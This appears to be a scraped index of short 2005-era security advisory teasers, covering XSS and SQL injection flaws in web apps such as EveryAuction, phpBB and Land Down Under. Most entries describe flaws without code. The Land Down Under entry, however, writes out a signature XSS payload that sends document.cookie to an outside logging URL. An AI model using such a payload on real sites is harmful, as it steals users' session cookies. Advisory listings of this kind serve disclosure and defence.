[SA18016] EveryAuction "searchstring" Cross-Site Scripting Vulnerability

TITLE: EveryAuction "searchstring" Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA18016 VERIFY ADVISORY: http://secunia.com/advisories/18016/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: EveryAuction 1.x http://secunia.com/product/6482/ DESCRIPTION:...

LocazoList Classifieds v1.03c Vuln.

LocazoList Classifieds v1.03c Vuln. Vuln. dicovered by : r0t Date: 6 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/locazolist-classifieds-v103c-vuln.html vendor:http://locazo.net:81/applications/ affected version:v1.03c and prior Product Description: LocazoList a Free, text based...

Sitebeater News System XSS vuln.

Sitebeater News System XSS vuln. Vuln. dicovered by : r0t Date: 3 dec. 2005 Orginal advisory:http://pridels.blogspot.com/2005/12/sitebeater-news-system-xss-vuln.html affected version: 4.00 and prior Product Description: News Features: mailing lists, polls, themes, attachments, search, categories,...

DRZES HMS 3.2 Multiple vuln.

DRZES HMS 3.2 - Hosting Management System -multiple SQL inj. vuln. and XSS vuln. Vuln. dicovered by : r0t Date: 25 nov. 2005 Orginal advisory:http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html Vendor:http://drzes.com/ affected version:3.2 and prior Product description: Increase...

Virtual Hosting Control System 2.22.4 - Error Message Cross-Site Scripting

Virtual Hosting Control System 2.22.4 - Error Message Cross-Site Scripting source: https://www.securityfocus.com/bid/15538/info Virtual Hosting Control System is prone to cross-site scripting attacks. The vulnerability arises when error messages are rendered and could let an attacker inject hosti...

Affiliate Network Pro v7.2 SQL Injections, Arbitrary code execution, XSS

Affiliate Network Pro v7.2 SQL Injections, Arbitrary code execution, XSS ======================================================================== Software: Affiliate Network Pro v7.2 Severity: SQL Injections, Arbitrary code execution, XSS Risk: High Author: Robin Verton [email protected] Date:...

eZ Publish <= 2.2.7 Multiple XSS Vulnerabilities

eZ Publish is prone to multiple cross-site scripting XSS vulnerabiliites. SPDX-FileCopyrightText: 2003 k-otik.com Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

phpBB-IE-gif.txt

phpBB 2.0.17 and other BB systems as well Cookie disclosure exploit. I sent the report to phpBB and they said that a patch will be available withing a few days and It will be integrated into 2.0.18 . Note: This works like XSS, and requires the victim to use IE Affects all versions of IE. Special...

PHP Advanced Transfer Manager Multiple Vulnerabilities

Secunia Advisory: SA16867 Release Date: 2005-09-20 Critical: Moderately critical Impact: Cross Site Scripting Exposure of system information Exposure of sensitive information Where: From remote Solution Status: Unpatched Software: PHP Advanced Transfer Manager 1.x Select a product and view a...

Calendar Express Multiple Vulnerabilities (SQLi, XSS)

The remote host is using Calendar Express, a PHP web calendar. Vulnerabilities exist in this version that could allow an attacker to execute arbitrary HTML and script code in the context of the user's browser, and SQL injection. An attacker could exploit these flaws to use the remote host to...

Mozilla Products (Host:) Buffer Overflow Denial of Service String

Exploit for multiple platform in category dos / poc ================================================================= Mozilla Products Host: Buffer Overflow Denial of Service String ================================================================= -- 0day.today 2018-04-02...

Mozilla Products - &#039;Host:&#039; Buffer Overflow (Denial of Service) (PoC) String

-- milw0rm.com 2005-09-09...

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

Debian DSA-778-1 : mantis - missing input sanitising

Two security related problems have been discovered in Mantis, a web-based bug tracking system. The Common Vulnerabilities and Exposures project identifies the following problems : - CAN-2005-2556 A remote attacker could supply a specially crafted URL to scan arbitrary ports on arbitrary hosts tha...

bluecoat7111.txt

Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities ============================================================ Blue Coat Reporter ================== "Blue Coat Reporter 7 provides identity-based reporting on Web communications enabling enterprises to evaluate Web policies and manage...

Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting

Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting source: https://www.securityfocus.com/bid/14506/info Chipmunk CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...

[SA15589] Lpanel Multiple Vulnerabilities

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

[SA15603] FlatNuke Multiple Vulnerabilities

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

php2014.txt

/ -------------------------------------------------------- Neo Security Team NST® - Advisory 14 - 17/04/05 -------------------------------------------------------- Program: phpBB 2.0.14 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.14 & Lower versions Risk: Low Risk!! Impact:...

Sambar Server 5.x6.06.1 - results.stm indexname Cross-Site Scripting

Sambar Server 5.x6.06.1 - results.stm indexname Cross-Site Scripting source: https://www.securityfocus.com/bid/13722/info Sambar Server administrative interface does not adequately filter some HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to...